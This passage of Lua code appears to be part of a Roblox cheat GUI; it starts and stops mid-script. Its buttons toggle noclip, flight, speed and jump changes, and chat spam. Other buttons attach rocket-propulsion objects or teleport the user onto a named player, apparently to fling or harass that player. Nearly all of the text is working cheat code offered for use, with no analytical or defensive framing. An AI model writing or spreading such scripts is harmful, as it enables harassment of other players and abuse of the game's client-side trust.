track:Play() game:GetService('RunService').Stepped:connect(function() if DanceActive then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end) end else track:Stop() Dance.BackgroundColor3 = col end end) AnimationId = "282574440" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) HideActive = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) HideActive = false end) Hide.MouseButton1Click:connect(function() HideActive = not HideActive if HideActive then Hide.BackgroundColor3 = loc for i, v in pairs(GetPlayer(EnterUsername.Text)) do track:Play() game:GetService('RunService').Stepped:connect(function() if HideActive then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.Head.CFrame end end) end else track:Stop() Hide.BackgroundColor3 = col end end) AnimationId = "313762630" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) LevitateOnActive = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) LevitateOnActive = false end) LevitateOn.MouseButton1Click:connect(function() LevitateOnActive = not LevitateOnActive if LevitateOnActive then LevitateOn.BackgroundColor3 = loc for i, v in pairs(GetPlayer(EnterUsername.Text)) do track:Play() game:GetService('RunService').Stepped:connect(function() if LevitateOnActive then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end) end else track:Stop() LevitateOn.BackgroundColor3 = col end end) AnimationId = "215384594" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) PushLockActive = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) PushLockActive = false end) PushLock.MouseButton1Click:connect(function() PushLockActive = not PushLockActive if PushLockActive then PushLock.BackgroundColor3 = loc for i, v in pairs(GetPlayer(EnterUsername.Text)) do track:Play() game:GetService('RunService').Stepped:connect(function() if PushLockActive then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end) end else track:Stop() PushLock.BackgroundColor3 = col end end) AnimationId = "184574340" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) SlamOnActive = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) SlamOnActive = false end) SlamOn.MouseButton1Click:connect(function() SlamOnActive = not SlamOnActive if SlamOnActive then SlamOn.BackgroundColor3 = loc for i, v in pairs(GetPlayer(EnterUsername.Text)) do track:Play() game:GetService('RunService').Stepped:connect(function() if SlamOnActive then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end) end else track:Stop() SlamOn.BackgroundColor3 = col end end) ------ BASIC ------------------------------------------------------------------------- ------ BASIC ------------------------------------------------------------------------- ------ BASIC ------------------------------------------------------------------------- ------ BASIC ------------------------------------------------------------------------- HipHeight.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.HipHeight = STATCHANGE.Text end) JumpHeight.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower = STATCHANGE.Text end) Speed.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = STATCHANGE.Text end) Chat.MouseButton1Click:connect(function() game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(CHATBOX.Text, "All") end) keepspam = false Spam.MouseButton1Click:connect(function() keepspam = not keepspam if keepspam then Spam.BackgroundColor3 = loc else Spam.BackgroundColor3 = col end while wait(0.5) do if keepspam then game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(CHATBOX.Text, "All") end end end) clip = true Noclip.MouseButton1Click:connect(function() clip = not clip game:GetService('RunService').Stepped:connect(function() if not clip then Noclip.BackgroundColor3 = loc game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false else Noclip.BackgroundColor3 = col end end) end) local flying = false Fly.MouseButton1Click:connect(function() flying = not flying repeat wait() until game:GetService("Players").LocalPlayer and game:GetService("Players").LocalPlayer.Character and game:GetService("Players").LocalPlayer.Character:findFirstChild("Torso") and game:GetService("Players").LocalPlayer.Character:findFirstChild("Humanoid") local mouse = game:GetService("Players").LocalPlayer:GetMouse() repeat wait() until mouse local plr = game:GetService("Players").LocalPlayer local torso = plr.Character.Torso local deb = true local ctrl = { f = 0, b = 0, l = 0, r = 0 } local lastctrl = { f = 0, b = 0, l = 0, r = 0 } local maxspeed = 70 local speed = 0 if flying then Fly.BackgroundColor3 = loc else Fly.BackgroundColor3 = col end function FlyFunction() local bg = Instance.new("BodyGyro", torso) bg.P = 9e4 bg.maxTorque = Vector3.new(9e9, 9e9, 9e9) bg.cframe = torso.CFrame local bv = Instance.new("BodyVelocity", torso) bv.velocity = Vector3.new(0, 0.1, 0) bv.maxForce = Vector3.new(9e9, 9e9, 9e9) repeat wait() plr.Character.Humanoid.PlatformStand = true if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then speed = speed + .5 + (speed / maxspeed) if speed > maxspeed then speed = maxspeed end elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then speed = speed - 1 if speed < 0 then speed = 0 end end if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then bv.velocity = ((game:GetService("Workspace").CurrentCamera.CoordinateFrame.lookVector * (ctrl.f + ctrl.b)) + ((game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l + ctrl.r, (ctrl.f + ctrl.b) * .2, 0).p) - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p)) * speed lastctrl = { f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r } elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then bv.velocity = ((game:GetService("Workspace").CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f + lastctrl.b)) + ((game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l + lastctrl.r, (lastctrl.f + lastctrl.b) * .2, 0).p) - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p)) * speed else bv.velocity = Vector3.new(0, 0.1, 0) end bg.cframe = game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f + ctrl.b) * 50 * speed / maxspeed), 0, 0) until not flying ctrl = { f = 0, b = 0, l = 0, r = 0 } lastctrl = { f = 0, b = 0, l = 0, r = 0 } speed = 0 bg:Destroy() bv:Destroy() plr.Character.Humanoid.PlatformStand = false end mouse.KeyDown:connect(function(key) if key:lower() == "w" then ctrl.f = 1 elseif key:lower() == "s" then ctrl.b = -1 elseif key:lower() == "a" then ctrl.l = -1 elseif key:lower() == "d" then ctrl.r = 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then ctrl.f = 0 elseif key:lower() == "s" then ctrl.b = 0 elseif key:lower() == "a" then ctrl.l = 0 elseif key:lower() == "d" then ctrl.r = 0 end end) FlyFunction() end) ------ EXTRA ------------------------------------------------------------------------- ------ EXTRA ------------------------------------------------------------------------- ------ EXTRA ------------------------------------------------------------------------- ------ EXTRA ------------------------------------------------------------------------- frost = false Freeze.MouseButton1Click:connect(function() frost = not frost if frost then game:GetService("Players").LocalPlayer.Character.Torso.Anchored = true game:GetService("Players").LocalPlayer.Character.Head.Anchored = true game:GetService("Players").LocalPlayer.Character["Left Leg"].Anchored = true game:GetService("Players").LocalPlayer.Character["Left Arm"].Anchored = true game:GetService("Players").LocalPlayer.Character["Right Leg"].Anchored = true game:GetService("Players").LocalPlayer.Character["Right Arm"].Anchored = true Freeze.BackgroundColor3 = loc else game:GetService("Players").LocalPlayer.Character.Torso.Anchored = false game:GetService("Players").LocalPlayer.Character.Head.Anchored = false game:GetService("Players").LocalPlayer.Character["Left Leg"].Anchored = false game:GetService("Players").LocalPlayer.Character["Left Arm"].Anchored = false game:GetService("Players").LocalPlayer.Character["Right Leg"].Anchored = false game:GetService("Players").LocalPlayer.Character["Right Arm"].Anchored = false Freeze.BackgroundColor3 = col end end) insanity = false local Anim = Instance.new("Animation") AnimationId = "33796059" Anim.AnimationId = "rbxassetid://" .. AnimationId local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) insanity = false end) Insane.MouseButton1Down:connect(function() insanity = not insanity if insanity then track:Play(0.1, 1, 999) Insane.BackgroundColor3 = loc else track:Stop() Insane.BackgroundColor3 = col end end) Sit.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.Sit = true end) Jump.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.Jump = true end) platform = false PlatformStand.MouseButton1Click:connect(function() platform = not platform if platform then game:GetService("Players").LocalPlayer.Character.Humanoid.PlatformStand = true PlatformStand.BackgroundColor3 = loc else game:GetService("Players").LocalPlayer.Character.Humanoid.PlatformStand = false PlatformStand.BackgroundColor3 = col end end) TPVoid.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(math.huge, math.huge, math.huge) end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://204295235" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) question = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) question = false end) Unknown.MouseButton1Click:connect(function() question = not question if question then Unknown.BackgroundColor3 = loc while wait do if track.IsPlaying == false then if question then track:Play(0.1, 1, 1e5) end end end else Unknown.BackgroundColor3 = col track:Stop() end end) Reset.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Head:Destroy() end) ------ LOCALPLAYER ------------------------------------------------------------------------- ------ LOCALPLAYER ------------------------------------------------------------------------- ------ LOCALPLAYER ------------------------------------------------------------------------- ------ LOCALPLAYER ------------------------------------------------------------------------- local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://215384594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local CloneIllusionACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) CloneIllusionACTIVE = false end) CloneIllusion.MouseButton1Click:connect(function() CloneIllusionACTIVE = not CloneIllusionACTIVE if CloneIllusionACTIVE then track:Play(.5, 1, 1e7) CloneIllusion.BackgroundColor3 = loc else track:Stop() CloneIllusion.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://204328711" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local DinoWalkACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) DinoWalkACTIVE = false end) Dinosaur.MouseButton1Click:connect(function() DinoWalkACTIVE = not DinoWalkACTIVE if DinoWalkACTIVE then track:Play(.1, 1, 1) Dinosaur.BackgroundColor3 = loc game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = 30 game:GetService("Players").LocalPlayer.Character.Humanoid.JumpHeight = 200 else track:Stop() Dinosaur.BackgroundColor3 = col game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = 16 game:GetService("Players").LocalPlayer.Character.Humanoid.JumpHeight = 50 end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://313762630" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local GlitchLevitateACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) GlitchLevitateACTIVE = false end) Glitchy.MouseButton1Click:connect(function() GlitchLevitateACTIVE = not GlitchLevitateACTIVE if GlitchLevitateACTIVE then track:Play(.5, 1, 1e7) Glitchy.BackgroundColor3 = loc else track:Stop() Glitchy.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://313762630" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local LevitateACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) LevitateACTIVE = false end) Levitate.MouseButton1Click:connect(function() LevitateACTIVE = not LevitateACTIVE if LevitateACTIVE then track:Play(.1, 1, 1) Levitate.BackgroundColor3 = loc else track:Stop() Levitate.BackgroundColor3 = col end end) NoLimbs.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character["Left Leg"]:Destroy() game:GetService("Players").LocalPlayer.Character["Left Arm"]:Destroy() game:GetService("Players").LocalPlayer.Character["Right Leg"]:Destroy() game:GetService("Players").LocalPlayer.Character["Right Arm"]:Destroy() end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://180612465" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local ScaredACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) ScaredACTIVE = false end) CrouchRocket.MouseButton1Click:connect(function() ScaredACTIVE = not ScaredACTIVE if ScaredACTIVE then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "CrouchRocket" u.Target = game:GetService("Players").LocalPlayer.Character.Head u:Fire() CrouchRocket.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if ScaredACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() CrouchRocket.BackgroundColor3 = col game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CrouchRocket:Destroy() end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://313762630" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local Anim2 = Instance.new("Animation") Anim2.AnimationId = "rbxassetid://35154961" local track2 = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim2) local Anim3 = Instance.new("Animation") Anim3.AnimationId = "rbxassetid://33169583" local track3 = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim3) haunting = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) track2 = character:WaitForChild("Humanoid"):LoadAnimation(Anim2) track3 = character:WaitForChild("Humanoid"):LoadAnimation(Anim3) haunting = false end) Haunted.MouseButton1Click:connect(function() haunting = not haunting if haunting then while true do if track3.IsPlaying == false then if haunting then track:Play() track2:Play(0.1, 1, 1000) track3:Play(0.1, 1, 1000) end end end else track:Stop() track2:Stop() track3:Stop() end end) spinning = false CrazySpin.MouseButton1Click:connect(function() spinning = not spinning if spinning then local p = Instance.new("RocketPropulsion") p.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart p.Name = "CrazySpin" p.Target = game:GetService("Players").LocalPlayer.Character["Left Arm"] p:Fire() CrazySpin.BackgroundColor3 = loc else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CrazySpin:Destroy() CrazySpin.BackgroundColor3 = col end end) ------ ROCKETPROPULSION ------------------------------------------------------------------------- ------ ROCKETPROPULSION ------------------------------------------------------------------------- ------ ROCKETPROPULSION ------------------------------------------------------------------------- ------ ROCKETPROPULSION ------------------------------------------------------------------------- floating = false Float.MouseButton1Click:connect(function() floating = not floating if floating then Float.BackgroundColor3 = loc local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 50000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Float" for i, v in pairs(GetPlayer(EnterUsername.Text)) do y.Target = game:GetService("Players")[v.Name].Character.Head y:Fire() game:GetService('RunService').Stepped:connect(function() if floating then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) while wait(0.3) do if floating then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Leg"].CFrame end end end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Float:Destroy() Float.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://282574440" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) flattening = false Flatten.MouseButton1Click:connect(function() flattening = not flattening if flattening then Flatten.BackgroundColor3 = loc local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 50000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Flatten" for i, v in pairs(GetPlayer(EnterUsername.Text)) do y.Target = game:GetService("Players")[v.name].Character["Left Leg"] y:Fire() track:Play(.1, 1, 1) game:GetService('RunService').Stepped:connect(function() if flattening then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) while wait(0.3) do if flattening then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame + Vector3.new(0, 2, 0) end end end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Flatten:Destroy() track:Stop() Flatten.BackgroundColor3 = col end end) pushing = false Push.MouseButton1Click:connect(function() pushing = not pushing if pushing then Push.BackgroundColor3 = loc local b = Instance.new("RocketPropulsion") b.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart b.TurnP = 2500 b.MaxThrust = 50000 b.MaxSpeed = 1000 b.ThrustP = 50000 b.CartoonFactor = 1 b.Name = "Push" for i, v in pairs(GetPlayer(EnterUsername.Text)) do b.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart b:Fire() game:GetService('RunService').Stepped:connect(function() if pushing then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Push:Destroy() Push.BackgroundColor3 = col end end) SlowAttracting = false SlowAttract.MouseButton1Click:connect(function() SlowAttracting = not SlowAttracting if SlowAttracting then SlowAttract.BackgroundColor3 = loc local b = Instance.new("RocketPropulsion") b.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart b.TurnD = 5000 b.MaxThrust = 5000 b.MaxSpeed = 200 b.ThrustP = 5000 b.CartoonFactor = 1 b.Name = "SlowAttract" for i, v in pairs(GetPlayer(EnterUsername.Text)) do b.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart b:Fire() game:GetService('RunService').Stepped:connect(function() if SlowAttracting then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.SlowAttract:Destroy() SlowAttract.BackgroundColor3 = col end end) Maxing = false Max.MouseButton1Click:connect(function() Maxing = not Maxing if Maxing then Max.BackgroundColor3 = loc local t1 = Instance.new("RocketPropulsion") t1.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t1.TurnP = 100000 t1.MaxThrust = 100000 t1.MaxSpeed = 5000 t1.ThrustP = 100000 t1.CartoonFactor = 1 t1.Name = "one" local t2 = Instance.new("RocketPropulsion") t2.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t2.TurnP = 100000 t2.MaxThrust = 100000 t2.MaxSpeed = 5000 t2.ThrustP = 100000 t2.CartoonFactor = 1 t2.Name = "two" local t3 = Instance.new("RocketPropulsion") t3.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t3.TurnP = 100000 t3.MaxThrust = 100000 t3.MaxSpeed = 5000 t3.ThrustP = 100000 t3.CartoonFactor = 1 t3.Name = "three" local t4 = Instance.new("RocketPropulsion") t4.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t4.TurnP = 100000 t4.MaxThrust = 100000 t4.MaxSpeed = 5000 t4.ThrustP = 100000 t4.CartoonFactor = 1 t4.Name = "four" local t5 = Instance.new("RocketPropulsion") t5.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t5.TurnP = 100000 t5.MaxThrust = 100000 t5.MaxSpeed = 5000 t5.ThrustP = 100000 t5.CartoonFactor = 1 t5.Name = "five" local t6 = Instance.new("RocketPropulsion") t6.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t6.TurnP = 100000 t6.MaxThrust = 100000 t6.MaxSpeed = 5000 t6.ThrustP = 100000 t6.CartoonFactor = 1 t6.Name = "six" for i, v in pairs(GetPlayer(EnterUsername.Text)) do t1.Target = game:GetService("Players")[v.Name].Character.Torso t1:Fire() t2.Target = game:GetService("Players")[v.Name].Character["Right Leg"] t2:Fire() t3.Target = game:GetService("Players")[v.Name].Character["Left Arm"] t3:Fire() t4.Target = game:GetService("Players")[v.Name].Character["Left Leg"] t4:Fire() t5.Target = game:GetService("Players")[v.Name].Character["Right Arm"] t5:Fire() t6.Target = game:GetService("Players")[v.Name].Character.Head t6:Fire() game:GetService('RunService').Stepped:connect(function() if Maxing then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.one:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.two:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.three:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.four:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.five:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.six:Destroy() Max.BackgroundColor3 = col end end) AimHeading = false AimHead.MouseButton1Click:connect(function() AimHeading = not AimHeading if AimHeading then AimHead.BackgroundColor3 = loc local b = Instance.new("RocketPropulsion") b.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart b.TurnP = 2500 b.MaxThrust = 50000 b.MaxSpeed = 1000 b.ThrustP = 50000 b.CartoonFactor = 1 b.Name = "AimHead" for i, v in pairs(GetPlayer(EnterUsername.Text)) do b.Target = game:GetService("Players")[v.Name].Character.Head b:Fire() game:GetService('RunService').Stepped:connect(function() if AimHeading then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.AimHead:Destroy() AimHead.BackgroundColor3 = col end end) Experimentaling = false Experimental.MouseButton1Click:connect(function() Experimentaling = not Experimentaling if Experimentaling then Experimental.BackgroundColor3 = loc local b = Instance.new("RocketPropulsion") b.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart b.TurnP = 15000 b.MaxThrust = 25000 b.MaxSpeed = 15000 b.ThrustP = 10000 b.CartoonFactor = 1 b.Name = "Experimental" for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head b.Target = game:GetService("Players")[v.Name].Character.Torso b:Fire() game:GetService('RunService').Stepped:connect(function() if Experimentaling then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Experimental:Destroy() Experimental.BackgroundColor3 = col game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character.Head end end) Multipleing = false Multiple.MouseButton1Click:connect(function() Multipleing = not Multipleing if Multipleing then Multiple.BackgroundColor3 = loc local t1 = Instance.new("RocketPropulsion") t1.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t1.TurnP = 30000 t1.MaxThrust = 30000 t1.MaxSpeed = 1000 t1.ThrustP = 30000 t1.CartoonFactor = 1 t1.Name = "one" local t2 = Instance.new("RocketPropulsion") t2.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t2.TurnP = 30000 t2.MaxThrust = 30000 t2.MaxSpeed = 1000 t2.ThrustP = 30000 t2.CartoonFactor = 1 t2.Name = "two" local t3 = Instance.new("RocketPropulsion") t3.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t3.TurnP = 30000 t3.MaxThrust = 30000 t3.MaxSpeed = 1000 t3.ThrustP = 30000 t3.CartoonFactor = 1 t3.Name = "three" for i, v in pairs(GetPlayer(EnterUsername.Text)) do t1.Target = game:GetService("Players")[v.Name].Character.Torso t1:Fire() t2.Target = game:GetService("Players")[v.Name].Character["Right Leg"] t2:Fire() t3.Target = game:GetService("Players")[v.Name].Character["Left Arm"] t3:Fire() game:GetService('RunService').Stepped:connect(function() if Multipleing then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.one:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.two:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.three:Destroy() Multiple.BackgroundColor3 = col end end) ------ TELEPORTATION ------------------------------------------------------------------------- ------ TELEPORTATION ------------------------------------------------------------------------- ------ TELEPORTATION ------------------------------------------------------------------------- ------ TELEPORTATION ------------------------------------------------------------------------- LockOnACTIVE = false LockOn.MouseButton1Click:connect(function() LockOnACTIVE = not LockOnACTIVE for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService('RunService').Stepped:connect(function() if LockOnACTIVE then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame LockOn.BackgroundColor3 = loc game:GetService('RunService').Stepped:connect(function() if LockOnACTIVE then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) else LockOn.BackgroundColor3 = col end end) end end) LockLegACTIVE = false LockLeg.MouseButton1Click:connect(function() LockLegACTIVE = not LockLegACTIVE for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService('RunService').Stepped:connect(function() if LockLegACTIVE then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Leg"].CFrame LockLeg.BackgroundColor3 = loc game:GetService('RunService').Stepped:connect(function() if LockLegACTIVE then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) else LockLeg.BackgroundColor3 = col end end) end end) LockArmACTIVE = false LockArm.MouseButton1Click:connect(function() LockArmACTIVE = not LockArmACTIVE for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService('RunService').Stepped:connect(function() if LockArmACTIVE then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Right Arm"].CFrame LockArm.BackgroundColor3 = loc game:GetService('RunService').Stepped:connect(function() if LockArmACTIVE then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left 